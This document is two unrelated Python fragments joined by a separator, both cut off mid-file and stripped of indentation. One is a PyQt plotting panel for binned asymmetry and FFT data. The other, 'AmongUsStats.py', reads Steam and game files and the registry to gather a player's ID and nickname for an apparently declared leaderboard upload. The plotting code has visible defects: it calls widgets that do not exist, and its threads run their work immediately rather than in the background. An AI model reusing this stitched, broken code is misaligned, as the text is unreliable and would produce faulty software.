def set_full_blank(self):
self.setEnabled(False)
self.set_blank()
self.axes_time.figure.canvas.draw()
class PlotControl(QtWidgets.QWidget):
def __init__(self):
QtWidgets.QWidget.__init__(self)
self._label_slider_bin = QtWidgets.QLabel('')
self._label_input_bin = QtWidgets.QLabel('Time Bins (ns)')
self.slider_bin = QtWidgets.QSlider(qt_constants.Horizontal)
self.input_bin = QtWidgets.QLineEdit()
self._label_time = QtWidgets.QLabel('Time')
self._label_time_xmin = QtWidgets.QLabel('XMin')
self._label_time_xmax = QtWidgets.QLabel('XMax')
self._label_time_ymin = QtWidgets.QLabel('YMin')
self._label_time_ymax = QtWidgets.QLabel('YMax')
self._label_time_yauto = QtWidgets.QLabel('Auto Y')
self.input_time_xmin = QtWidgets.QLineEdit()
self.input_time_xmax = QtWidgets.QLineEdit()
self.input_time_ymin = QtWidgets.QLineEdit()
self.input_time_ymax = QtWidgets.QLineEdit()
self.check_time_yauto = QtWidgets.QCheckBox()
self._label_freq = QtWidgets.QLabel('Frequency')
self._label_freq_xmin = QtWidgets.QLabel('XMin')
self._label_freq_xmax = QtWidgets.QLabel('XMax')
self._label_freq_xauto = QtWidgets.QLabel('Auto X')
self.input_freq_xmin = QtWidgets.QLineEdit()
self.input_freq_xmax = QtWidgets.QLineEdit()
self.check_freq_xauto = QtWidgets.QCheckBox()
self._set_widget_attributes()
self._set_widget_tooltips()
self._set_widget_dimensions()
self._set_widget_layout()
def _set_widget_attributes(self):
self.check_freq_xauto.setChecked(True)
self.check_time_yauto.setChecked(True)
self.input_time_xmin.setText("0")
self.input_time_xmax.setText("8")
self.input_time_ymin.setText("-0.3")
self.input_time_ymax.setText("-0.5")
self.input_freq_xmin.setText("0.0")
self.input_freq_xmax.setText("1.0")
self.input_time_ymin.setEnabled(False)
self.input_time_ymax.setEnabled(False)
self.input_freq_xmin.setEnabled(False)
self.input_freq_xmax.setEnabled(False)
self.slider_bin.setMinimum(1)
self.slider_bin.setMaximum(500)
self.slider_bin.setValue(150)
self.slider_bin.setTickPosition(QtWidgets.QSlider.TicksBothSides)
self.slider_bin.setTickInterval(20)
self.input_bin.setText(str(self.slider_bin.value()))
def _set_widget_tooltips(self):
self._label_input_bin.setToolTip("Set the size of the bin (in ns) for the asymmetries")
self.slider_bin.setToolTip("Set the size of the bin (in ns) for the asymmetries")
self.input_bin.setToolTip("Set the size of the bin (in ns) for the asymmetries")
self.slider_bin.setToolTip("Set the size of the bin (in ns) for the asymmetries")
self._label_time_xmin.setToolTip("Minimum time value of range to be displayed")
self._label_time_xmax.setToolTip("Maximum time value of range to be displayed")
self._label_time_ymin.setToolTip("Minimum time value of asymmetry to be displayed")
self._label_time_ymax.setToolTip("Maximum time value of asymmetry to be displayed")
self._label_time_yauto.setToolTip("Automatically determine y-axis limits")
self.input_time_xmin.setToolTip("Minimum time value of range to be displayed")
self.input_time_xmax.setToolTip("Maximum time value of range to be displayed")
self.input_time_ymin.setToolTip("Minimum time value of asymmetry to be displayed")
self.input_time_ymax.setToolTip("Maximum time value of asymmetry to be displayed")
self.check_time_yauto.setToolTip("Automatically determine y-axis limits")
self._label_freq_xmin.setToolTip("Minimum frequency value to be displayed")
self._label_freq_xmax.setToolTip("Maximum frequency value to be displayed")
self._label_freq_xauto.setToolTip("Automatically determine frequency limits")
self.input_freq_xmin.setToolTip("Minimum frequency value to be displayed")
self.input_freq_xmax.setToolTip("Maximum frequency value to be displayed")
self.check_freq_xauto.setToolTip("Automatically determine frequency limits")
def _set_widget_dimensions(self):
box_size = 20
self.input_time_xmin.setMinimumWidth(box_size)
self.input_time_xmax.setMinimumWidth(box_size)
self.input_time_ymin.setMinimumWidth(box_size)
self.input_time_ymax.setMinimumWidth(box_size)
self.input_freq_xmin.setMinimumWidth(box_size)
self.input_freq_xmax.setMinimumWidth(box_size)
self.input_bin.setFixedWidth(50)
def _set_widget_layout(self):
main_layout = QtWidgets.QVBoxLayout()
row_1 = QtWidgets.QHBoxLayout()
row_1.addWidget(self._label_input_bin)
row_1.addWidget(self.input_bin)
row_1.addWidget(self.slider_bin)
main_layout.addLayout(row_1)
time_form = QtWidgets.QGroupBox('Time')
time_form.setMaximumHeight(110)
time_layout = QtWidgets.QFormLayout()
time_grid = QtWidgets.QGridLayout()
time_grid.addWidget(self._label_time_xmin, 0, 2)
time_grid.addWidget(self.input_time_xmin, 0, 3)
time_grid.addWidget(self._label_time_xmax, 0, 4)
time_grid.addWidget(self.input_time_xmax, 0, 5)
time_grid.addWidget(self._label_time_yauto, 1, 0)
time_grid.addWidget(self.check_time_yauto, 1, 1)
time_grid.addWidget(self._label_time_ymin, 1, 2)
time_grid.addWidget(self.input_time_ymin, 1, 3)
time_grid.addWidget(self._label_time_ymax, 1, 4)
time_grid.addWidget(self.input_time_ymax, 1, 5)
temp_row = QtWidgets.QHBoxLayout()
temp_row.addLayout(time_grid)
time_layout.addRow(temp_row)
time_form.setLayout(time_layout)
freq_form = QtWidgets.QGroupBox('Frequency')
freq_form.setMaximumHeight(110)
freq_layout = QtWidgets.QFormLayout()
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(self._label_freq_xauto)
hbox.addWidget(self.check_freq_xauto)
hbox.addWidget(self._label_freq_xmin)
hbox.addWidget(self.input_freq_xmin)
hbox.addWidget(self._label_freq_xmax)
hbox.addWidget(self.input_freq_xmax)
temp_row = QtWidgets.QHBoxLayout()
temp_row.addLayout(hbox)
freq_layout.addRow(temp_row)
freq_form.setLayout(freq_layout)
editor_layout = QtWidgets.QHBoxLayout()
editor_layout.addWidget(time_form)
editor_layout.addWidget(freq_form)
main_layout.addLayout(editor_layout)
self.setLayout(main_layout)
def get_max_time(self):
return float(self.input_time_xmax.text())
def get_min_time(self):
return float(self.input_time_xmin.text())
def get_max_freq(self):
return float(self.input_freq_xmax.text())
def get_min_freq(self):
return float(self.input_freq_xmin.text())
def get_max_asymmetry(self):
return float(self.input_time_ymax.text())
def get_min_asymmetry(self):
return float(self.input_time_ymin.text())
def get_max_fft(self):
return float(self.input_freq_ymax.text())
def get_min_fft(self):
return float(self.input_freq_ymin.text())
def get_bin_from_input(self):
return float(self.input_bin.text())
def get_bin_from_slider(self):
return float(self.slider_bin.value())
def is_asymmetry_auto(self):
return self.check_time_yauto.isChecked()
def is_freq_auto(self):
return self.check_freq_xauto.isChecked()
def set_enabled_asymmetry_auto(self, enabled):
self.input_time_ymin.setEnabled(enabled)
self.input_time_ymax.setEnabled(enabled)
def set_enabled_frequency_auto(self, enabled):
self.input_freq_xmin.setEnabled(enabled)
self.input_freq_xmax.setEnabled(enabled)
def set_max_time(self, value):
self.input_time_xmax.setText('{0:.3f}'.format(value))
def set_min_time(self, value):
self.input_time_xmin.setText('{0:.3f}'.format(value))
def set_max_freq(self, value):
self.input_freq_xmax.setText('{0:.3f}'.format(value))
def set_min_freq(self, value):
self.input_freq_xmin.setText('{0:.3f}'.format(value))
def set_max_asymmetry(self, value):
self.input_time_ymax.setText('{0:.3f}'.format(value))
def set_min_asymmetry(self, value):
self.input_time_ymin.setText('{0:.3f}'.format(value))
def set_bin_input(self, value):
self.input_bin.setText(str(value))
def set_bin_slider(self, value):
self.slider_bin.setValue(int(value))
def __init__(self):
super(Panel, self).__init__()
super(QtWidgets.QWidget, self).__init__()
self.support_panel = PlottingPanel.SupportPanel()
self.left_settings = self.PlotControl()
self.left_display = self.PlotDisplay(self.left_settings)
self.right_settings = self.PlotControl()
self.right_display = self.PlotDisplay(self.right_settings)
self.legend_display = self.support_panel.legend_box
self._set_widget_layout()
self._presenter = PlottingPanelPresenter(self)
self.right_settings.input_bin.setText('5')
self.right_settings.slider_bin.setValue(5)
self.right_settings.input_time_xmax.setText('0.5')
def createSupportPanel(self) -> QtWidgets.QDockWidget:
return self.support_panel
def _set_widget_layout(self):
hbox = QtWidgets.QHBoxLayout()
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(self.left_display, 5)
vbox.addWidget(self.left_settings)
hbox.addLayout(vbox)
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(self.right_display, 5)
vbox.addWidget(self.right_settings)
hbox.addLayout(vbox)
self.setLayout(hbox)
class PlottingPanelPresenter(PanelPresenter):
def __init__(self, view: PlottingPanel):
super().__init__(view)
self.__run_service = services.RunService()
self.__style_service = services.StyleService()
self.__run_service.signals.added.connect(self.update)
self.__run_service.signals.changed.connect(self.update_after_change)
self.__populating_settings = False
self.__update_alpha = True
self.__logger = logging.getLogger(__name__)
self.__system_service = services.SystemService()
self._set_callbacks()
def _set_callbacks(self):
self._view.left_settings.input_time_xmin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.input_time_xmax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.input_time_ymin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.input_time_ymax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.check_time_yauto.stateChanged.connect(
lambda: self._on_check_parameter_changed(self._view.left_settings))
self._view.left_settings.input_freq_xmin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.input_freq_xmax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.check_freq_xauto.stateChanged.connect(lambda: self._on_check_parameter_changed('left'))
self._view.left_settings.slider_bin.sliderMoved.connect(lambda: self._on_bin_parameter_changed('left', True))
self._view.left_settings.slider_bin.sliderReleased.connect(
lambda: self._on_bin_parameter_changed('left', False))
self._view.left_settings.input_bin.returnPressed.connect(lambda: self._on_bin_parameter_changed('left', False))
self._view.right_settings.input_time_xmin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.input_time_xmax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.input_time_ymin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.input_time_ymax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.check_time_yauto.stateChanged.connect(
lambda: self._on_check_parameter_changed(self._view.right_settings))
self._view.right_settings.input_freq_xmin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.input_freq_xmax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.check_freq_xauto.stateChanged.connect(
lambda: self._on_check_parameter_changed('right'))
self._view.right_settings.slider_bin.sliderMoved.connect(lambda: self._on_bin_parameter_changed('right', True))
self._view.right_settings.slider_bin.sliderReleased.connect(
lambda: self._on_bin_parameter_changed('right', False))
self._view.right_settings.input_bin.returnPressed.connect(
lambda: self._on_bin_parameter_changed('right', False))
self._view.support_panel.plot_button.pressed.connect(self._on_plot_clicked)
self._view.support_panel.plot_all_button.pressed.connect(self._on_plot_all_clicked)
self._view.support_panel.clear_all_button.pressed.connect(self._on_clear_all_clicked)
self._view.support_panel.asymmetry_param_box.alpha_input.returnPressed.connect(self._on_alpha_changed)
self._view.support_panel.plot_style_box.all_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.DEFAULT_COLOR,
self._view.support_panel.plot_style_box.all_color_options.currentText()))
self._view.support_panel.plot_style_box.linestyle_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.LINESTYLE,
self._view.support_panel.plot_style_box.linestyle_options.currentText()))
self._view.support_panel.plot_style_box.line_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.LINE_COLOR,
self._view.support_panel.plot_style_box.line_color_options.currentText()))
self._view.support_panel.plot_style_box.line_width_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.LINE_WIDTH,
self._view.support_panel.plot_style_box.line_width_options.currentText()))
self._view.support_panel.plot_style_box.marker_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.MARKER,
self._view.support_panel.plot_style_box.marker_options.currentText()))
self._view.support_panel.plot_style_box.marker_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.MARKER_COLOR,
self._view.support_panel.plot_style_box.marker_color_options.currentText()))
self._view.support_panel.plot_style_box.marker_size_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.MARKER_SIZE,
self._view.support_panel.plot_style_box.marker_size_options.currentText()))
self._view.support_panel.plot_style_box.fillstyle_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.FILLSTYLE,
self._view.support_panel.plot_style_box.fillstyle_options.currentText()))
self._view.support_panel.plot_style_box.errorbar_style_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.ERRORBAR_STYLE,
self._view.support_panel.plot_style_box.errorbar_style_options.currentText()))
self._view.support_panel.plot_style_box.errorbar_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.ERRORBAR_COLOR,
self._view.support_panel.plot_style_box.errorbar_color_options.currentText()))
self._view.support_panel.plot_style_box.errorbar_width_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.ERRORBAR_WIDTH,
self._view.support_panel.plot_style_box.errorbar_width_options.currentText()))
self._view.support_panel.plot_style_box.fit_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.FIT_COLOR,
self._view.support_panel.plot_style_box.fit_color_options.currentText()))
self._view.support_panel.plot_style_box.fit_linestyle_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.FIT_LINESTYLE,
self._view.support_panel.plot_style_box.fit_linestyle_options.currentText()))
self._view.support_panel.item_tree.itemSelectionChanged.connect(self._populate_settings)
self.__system_service.signals.theme_changed.connect(self._on_theme_changed)
@QtCore.pyqtSlot()
def _on_spectrum_settings_changed(self, side):
self._start_update(side)
@QtCore.pyqtSlot()
def _on_style_parameter_changed(self, key, value):
if not self.__populating_settings:
ids = self._view.support_panel.item_tree.get_selected()
self.__style_service.change_style_parameter(ids, key, value)
self._start_update('both')
@QtCore.pyqtSlot()
def _on_plot_all_clicked(self):
self._view.support_panel.item_tree.set_all_checked(True)
self._plot()
@QtCore.pyqtSlot()
def _on_plot_clicked(self):
self._plot()
@QtCore.pyqtSlot()
def _on_clear_all_clicked(self):
self._view.support_panel.item_tree.set_all_checked(False)
self._view.legend_display.set_blank()
self._start_update(side='both')
@QtCore.pyqtSlot()
def _on_bin_parameter_changed(self, side, moving):
if side == 'left':
settings = self._view.left_settings
else:
settings = self._view.right_settings
if moving:
value = settings.get_bin_from_slider()
settings.set_bin_input(value)
if value % 5 != 0:
return
else:
bin_size = settings.get_bin_from_input()
if bin_size <= 0:
WarningMessageDialog.launch(["Cannot set bin size to {}.".format(bin_size)]) # FIXME just use args*
return
settings.set_bin_slider(settings.get_bin_from_input())
self._start_update(side)
@QtCore.pyqtSlot()
def _on_check_parameter_changed(self, side):
if side == 'left':
settings = self._view.left_settings
else:
settings = self._view.right_settings
settings.set_enabled_asymmetry_auto(not settings.is_asymmetry_auto())
settings.set_enabled_frequency_auto(not settings.is_freq_auto())
@QtCore.pyqtSlot()
def _on_alpha_changed(self):
self.update_alpha()
@QtCore.pyqtSlot()
def _on_theme_changed(self):
self._view.left_display.set_stylesheet()
self._view.right_display.set_stylesheet()
if self._view.left_display.axes_time.lines:
self._view.left_display.set_style()
self._view.right_display.set_style()
else:
self._view.left_display.set_blank()
self._view.right_display.set_blank()
def _update_canvas(self, settings, display, side, fast=False):
ids = self._view.support_panel.item_tree.get_run_ids()
runs = self.__run_service.get_runs_by_ids(ids)
display.start_plotting()
if len(runs) == 0:
display.set_full_blank()
self._view.legend_display.set_blank()
return
else:
self._view.setEnabled(True)
max_asymmetry = -1
min_asymmetry = 1
max_fft = 0
min_time = settings.get_min_time()
max_time = settings.get_max_time()
bin_size = settings.get_bin_from_input()
legend_values = {}
for run in runs:
if run.asymmetries[objects.RunDataset.FULL_ASYMMETRY] is None:
continue
if side == 'left':
asymmetry = run.asymmetries[objects.RunDataset.FULL_ASYMMETRY].bin(bin_size).cut(min_time, max_time)
run.asymmetries[objects.RunDataset.LEFT_BINNED_ASYMMETRY] = asymmetry
else:
asymmetry = run.asymmetries[objects.RunDataset.FULL_ASYMMETRY].bin(bin_size).cut(min_time, max_time)
run.asymmetries[objects.RunDataset.RIGHT_BINNED_ASYMMETRY] = asymmetry
time = asymmetry.time
uncertainty = asymmetry.uncertainty
fit = asymmetry.calculated
style = self.__style_service.get_style_by_run_id(run.id)
legend_values[run.id] = (
style[self.__style_service.Keys.LABEL], style[self.__style_service.Keys.DEFAULT_COLOR]
if style[self.__style_service.Keys.MARKER_COLOR] == 'Default' else style[
self.__style_service.Keys.MARKER_COLOR])
# We have to do this logic because Matplotlib is not good at setting good default plot limits
frac_start = float(min_time) / (time[len(time) - 1] - time[0])
frac_end = float(max_time) / (time[len(time) - 1] - time[0])
start_index = int(np.floor(len(asymmetry) * frac_start))
end_index = int(np.floor(len(asymmetry) * frac_end))
local_max = np.max(asymmetry[start_index:end_index])
max_asymmetry = local_max if local_max > max_asymmetry else max_asymmetry
local_min = np.min(asymmetry[start_index:end_index])
min_asymmetry = local_min if local_min < min_asymmetry else min_asymmetry
display.plot_asymmetry(time, asymmetry, uncertainty, fit,
color=style[self.__style_service.Keys.DEFAULT_COLOR],
marker=style[self.__style_service.Keys.MARKER],
linestyle=style[self.__style_service.Keys.LINESTYLE],
fillstyle=style[self.__style_service.Keys.FILLSTYLE],
marker_color=style[self.__style_service.Keys.MARKER_COLOR],
marker_size=style[self.__style_service.Keys.MARKER_SIZE],
line_color=style[self.__style_service.Keys.LINE_COLOR],
line_width=style[self.__style_service.Keys.LINE_WIDTH],
errorbar_color=style[self.__style_service.Keys.ERRORBAR_COLOR],
errorbar_style=style[self.__style_service.Keys.ERRORBAR_STYLE],
errorbar_width=style[self.__style_service.Keys.ERRORBAR_WIDTH],
fit_color=style[self.__style_service.Keys.FIT_COLOR],
fit_linestyle=style[self.__style_service.Keys.FIT_LINESTYLE])
if not fast:
f_min = settings.get_min_freq()
if settings.is_freq_auto():
f_max = 1 / (2 * (bin_size / 1000))
else:
f_max = settings.get_max_freq()
frequencies, fft = self.get_fft_data(time, asymmetry, min_time, max_time, bin_size, f_min, f_max)
local_max = np.max(fft)
max_fft = local_max if local_max > max_fft else max_fft
display.plot_fft(frequencies, fft,
style[self.__style_service.Keys.DEFAULT_COLOR],
style[self.__style_service.Keys.LABEL])
display.set_fft_plot_limits(max_fft, f_max)
display.set_asymmetry_plot_limits(max_asymmetry, min_asymmetry)
display.finish_plotting()
self._view.legend_display.set_legend(legend_values)
@QtCore.pyqtSlot()
def update(self, runs_changed=False):
run_datasets = self.__run_service.get_runs()
alphas = {'{:.5f}'.format(run.asymmetries[run.FULL_ASYMMETRY].alpha) for run in run_datasets if
run.asymmetries[run.FULL_ASYMMETRY] is not None}
self.__update_alpha = False
if len(alphas) == 1:
self._view.support_panel.asymmetry_param_box.alpha_input.setText(alphas.pop())
else:
self._view.support_panel.asymmetry_param_box.alpha_input.setText('1.0')
self.__update_alpha = True
for run in run_datasets:
self.__style_service.add_style_for_run(run, False, True)
if runs_changed:
self._start_update('both')
self._populate_settings()
def _plot(self):
def _verify_asymmetries_are_calculated():
runs_without_asymmetries = []
for run in runs:
if run.asymmetries[objects.RunDataset.FULL_ASYMMETRY] is None:
runs_without_asymmetries.append(run)
if len(runs_without_asymmetries) > 0:
code = PlotFileDialog.launch([runs_without_asymmetries])
if code == PlotFileDialog.Codes.NO_FILES_PLOTTED:
return False
return True
ids = self._view.support_panel.item_tree.get_run_ids()
runs = self.__run_service.get_runs_by_ids(ids)
verified = _verify_asymmetries_are_calculated()
if not verified:
return
self._start_update(side='both')
def update_after_change(self):
self.update(True)
def update_alpha(self):
if not self.__update_alpha:
return
try:
alpha = float(self._view.support_panel.asymmetry_param_box.alpha_input.text())
except ValueError:
return
ids = self._view.support_panel.item_tree.get_selected()
if len(ids) > 0:
self.__run_service.update_alphas(ids, [alpha])
def get_fft_data(self, time, asymmetry, x_min, x_max, bin_size, f_min, f_max):
num_bins = int((float(x_max) - float(x_min)) / (float(bin_size) / 1000))
start_bin = int(float(x_min) / (float(bin_size) / 1000))
z, fft = objects.Asymmetry.fft(asymmetry[start_bin:start_bin + num_bins], time[start_bin:start_bin + num_bins], f_min, f_max)
return z, np.divide(fft, max(fft))
def _start_update(self, side):
if side == 'left' or side == 'both':
threading.Thread(
target=self._update_canvas(self._view.left_settings, self._view.left_display, 'left', fast=False),
daemon=True).start()
if side == 'right' or side == 'both':
threading.Thread(
target=self._update_canvas(self._view.right_settings, self._view.right_display, 'right', fast=False),
daemon=True).start()
def _populate_settings(self):
self.__populating_settings = True # Because this sends a lot of signals because QComboBoxes are changing
ids = self._view.support_panel.item_tree.get_selected()
runs = self.__run_service.get_runs_by_ids(ids)
styles = [self.__style_service.get_style_by_run_id(rid) for rid in ids]
alphas = {'{:.5f}'.format(run.asymmetries[run.FULL_ASYMMETRY].alpha) for run in runs if
run.asymmetries[run.FULL_ASYMMETRY] is not None}
if len(alphas) == 1:
self._view.support_panel.asymmetry_param_box.alpha_input.setText(alphas.pop())
else:
self._view.support_panel.asymmetry_param_box.alpha_input.setText('1.0')
self.__update_alpha = True
if len(styles) > 1:
self._populate_with_multiple_selected(styles)
elif len(styles) == 1:
self._populate_with_single_selected(styles)
else:
pass
self.__populating_settings = False
def _populate_with_single_selected(self, styles):
"""
This method populates the combo boxes in the Plot Style group with the style of the run selected.
"""
style = styles[0]
self._view.support_panel.set_errorbar_color(
self.__style_service.color_options_extra[style[self.__style_service.Keys.ERRORBAR_COLOR]])
self._view.support_panel.set_default_color(
self.__style_service.color_options[style[self.__style_service.Keys.DEFAULT_COLOR]])
self._view.support_panel.set_fit_color(
self.__style_service.color_options_extra[style[self.__style_service.Keys.FIT_COLOR]])
self._view.support_panel.set_errorbar_style(
self.__style_service.errorbar_styles[style[self.__style_service.Keys.ERRORBAR_STYLE]])
self._view.support_panel.set_errorbar_width(
self.__style_service.errorbar_width[style[self.__style_service.Keys.ERRORBAR_WIDTH]])
self._view.support_panel.set_fillstyle(
self.__style_service.fillstyle_options[style[self.__style_service.Keys.FILLSTYLE]])
self._view.support_panel.set_line_color(
self.__style_service.color_options_extra[style[self.__style_service.Keys.LINE_COLOR]])
self._view.support_panel.set_line_width(
self.__style_service.line_width_options[style[self.__style_service.Keys.LINE_WIDTH]])
self._view.support_panel.set_linestyle(
self.__style_service.linestyle_options[style[self.__style_service.Keys.LINESTYLE]])
self._view.support_panel.set_marker(
self.__style_service.marker_options[style[self.__style_service.Keys.MARKER]])
self._view.support_panel.set_marker_color(
self.__style_service.color_options_extra[style[self.__style_service.Keys.MARKER_COLOR]])
self._view.support_panel.set_marker_size(
self.__style_service.marker_size_options[style[self.__style_service.Keys.MARKER_SIZE]])
def _populate_with_multiple_selected(self, styles):
"""
This method populates the combo boxes in the Plot Style group with the style of the runs selected.
"""
values = {self.__style_service.color_options[style[self.__style_service.Keys.DEFAULT_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_default_color("*")
else:
self._view.support_panel.set_default_color(values.pop())
values = {self.__style_service.errorbar_width[style[self.__style_service.Keys.ERRORBAR_WIDTH]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_errorbar_width("*")
else:
self._view.support_panel.set_errorbar_width(values.pop())
values = {self.__style_service.color_options_extra[style[self.__style_service.Keys.ERRORBAR_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_errorbar_color("*")
else:
self._view.support_panel.set_errorbar_color(values.pop())
values = {self.__style_service.color_options_extra[style[self.__style_service.Keys.FIT_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_fit_color("*")
else:
self._view.support_panel.set_fit_color(values.pop())
values = {self.__style_service.errorbar_styles[style[self.__style_service.Keys.ERRORBAR_STYLE]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_errorbar_style("*")
else:
self._view.support_panel.set_errorbar_style(values.pop())
values = {self.__style_service.marker_size_options[style[self.__style_service.Keys.MARKER_SIZE]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_marker_size("*")
else:
self._view.support_panel.set_marker_size(values.pop())
values = {self.__style_service.line_width_options[style[self.__style_service.Keys.LINE_WIDTH]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_line_width("*")
else:
self._view.support_panel.set_line_width(values.pop())
values = {self.__style_service.linestyle_options[style[self.__style_service.Keys.LINESTYLE]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_linestyle("*")
else:
self._view.support_panel.set_linestyle(values.pop())
values = {self.__style_service.fillstyle_options[style[self.__style_service.Keys.FILLSTYLE]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_fillstyle("*")
else:
self._view.support_panel.set_fillstyle(values.pop())
values = {self.__style_service.color_options_extra[style[self.__style_service.Keys.MARKER_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_marker_color("*")
else:
self._view.support_panel.set_marker_color(values.pop())
values = {self.__style_service.color_options_extra[style[self.__style_service.Keys.LINE_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_line_color("*")
else:
self._view.support_panel.set_line_color(values.pop())
values = {self.__style_service.marker_options[style[self.__style_service.Keys.MARKER]] for style in styles}
if len(values) > 1:
self._view.support_panel.set_marker("*")
else:
self._view.support_panel.set_marker(values.pop())
|
AmongUsStats.py
|
import PySimpleGUIQt as sg
import winreg
import threading
import time
import datetime
import json
import requests
import subprocess
import os, os.path
import sys, glob
import psutil
# If the application is run as a bundle, the PyInstaller bootloader extends the sys module by a flag frozen=True and sets the app path into variable _MEIPASS'.
if getattr(sys, 'frozen', False):
APP_DIR = sys._MEIPASS
APP_EXE = sys.executable.replace('\\','\\\\')
else:
APP_DIR = os.path.dirname(os.path.abspath(__file__))
APP_EXE = os.path.abspath(__file__).replace('\\','\\\\')
def subprocess_args(include_stdout=True):
if hasattr(subprocess, 'STARTUPINFO'):
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
env = os.environ
else:
si = None
env = None
if include_stdout:
ret = {'stdout': subprocess.PIPE}
else:
ret = {}
ret.update({'stdin': subprocess.PIPE,
'stderr': subprocess.PIPE,
'startupinfo': si,
'env': env })
return ret
# List of all currently monitored Statistics, including 7 unknown ones that are being collected.
stats = ['Bodies Reported',
'Emergencies Called',
'Tasks Completed',
'All Tasks Completed',
'Sabotages Fixed',
'Impostor Kills',
'Times Murdered',
'Times Ejected',
'Crewmate Streak',
'Times Impostor',
'Times Crewmate',
'Games Started',
'Games Finished',
'Crewmate Vote Wins',
'Crewmate Task Wins',
'Impostor Vote Wins',
'Impostor Kill Wins',
'Impostor Sabotage Wins',
'Unknown 1',
'Unknown 2',
'Unknown 3',
'Unknown 4',
'Unknown 5',
'Unknown 6',
'Unknown 7'
]
# Function to set windows registry keys
def set_reg(name, value, reg_path):
try:
winreg.CreateKey(winreg.HKEY_CURRENT_USER, reg_path)
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, reg_path, 0,
winreg.KEY_WRITE)
winreg.SetValueEx(registry_key, name, 0, winreg.REG_SZ, value)
winreg.CloseKey(registry_key)
return True
except WindowsError:
return False
# Function to get Windows registry keys
def get_reg(name, reg_path):
try:
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, reg_path, 0,
winreg.KEY_READ)
value, regtype = winreg.QueryValueEx(registry_key, name)
winreg.CloseKey(registry_key)
return value
except WindowsError:
return None
# List of Static Values used within the script
AMONG_US_EXE = "Among Us.exe"
APP_NAME = "Among Us: Statistics Grabber"
GAME_ID = "945360"
ICON = rf"{APP_DIR}\images\icon.ico"
LAUNCH_OPTIONS = rf' "LaunchOptions" "\"{APP_EXE}\" %command%"'
REG_STEAM = r"SOFTWARE\Valve\Steam"
REG_AMONG_US = r"SOFTWARE\Among Us Stat Grabber"
STAT_DIR = rf"C:\Users\{os.getlogin()}\AppData\LocalLow\Innersloth\Among Us"
STEAM_CONFIG_PATH = get_reg(r"SteamPath", REG_STEAM) + "/userdata/{}" + "/config/localconfig.vdf"
STEAM_EXE = "steam.exe"
STEAM_EXE_PATH = get_reg(r"SteamExe", REG_STEAM)
STEAMID64 = 76561197960265728
VERSION = "1.0"
# Check to see if REST URL exists in registry. If so, use this value instead of default
if get_reg(r"REST Endpoint", REG_AMONG_US):
URL = get_reg(r"REST Endpoint", REG_AMONG_US)
else:
URL = 'https://amongus.demix.network/leaderboard'
# Function to extract the unique Among Us User ID from file
def getID(file):
with open(file, 'r') as f:
userArray = f.readline()
x = json.loads(userArray[4:])
return x['userid']
# Function to convert the raw bytes in the statistics file into readable values
def bytes_to_int(bytes):
result = 0
for b in bytes:
result = result * 256 + int(b)
return result
# Function to check if a particular process is running or not
def process_running(process):
for p in psutil.process_iter(attrs=['pid', 'name']):
if p.info['name'] == process:
return True
# Function to Log messages to a file - Useful for debugging perhaps
def log(message):
f = open(rf"{STAT_DIR}\statGrabber.log", "a")
f.write(f"{datetime.datetime.now().strftime('%d-%m-%Y %H:%M:%S')}: {message}\n")
f.close()
# Function to extract Among Us nickname from file
def grabNickname():
with open(rf"{STAT_DIR}\playerPrefs") as file:
return file.readline().split(',')[0]
# Function to put together all statistics and upload them to REST endpoint
def grabStats():
data = {}
data['User ID'] = getID(max(glob.glob(os.path.join(rf"{STAT_DIR}\Unity\*\Analytics\ArchivedEvents", '*/')), key=os.path.getmtime) + "e")
data['Nickname'] = grabNickname()
